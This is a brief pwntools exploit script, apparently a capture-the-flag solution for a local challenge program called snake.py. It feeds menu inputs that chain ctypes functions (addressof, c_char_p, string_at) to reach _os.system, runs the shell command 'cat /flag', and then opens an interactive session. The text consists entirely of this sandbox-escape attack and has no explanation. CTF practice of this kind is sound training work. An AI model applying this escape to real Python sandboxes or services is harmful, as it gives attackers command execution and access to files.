p = process('python3 ./snake.py',shell=True)
p.sendline(b"1")
p.sendline(b"addressof")
p.sendline(b"1")
p.sendline(b"c_char_p")
p.sendline(b"2")
p.sendline(b"b'cat /flag'")
p.sendline(b"1")
p.sendline(b"string_at")
p.sendline(b"1")
p.sendline(b"_os.system")
p.interactive()
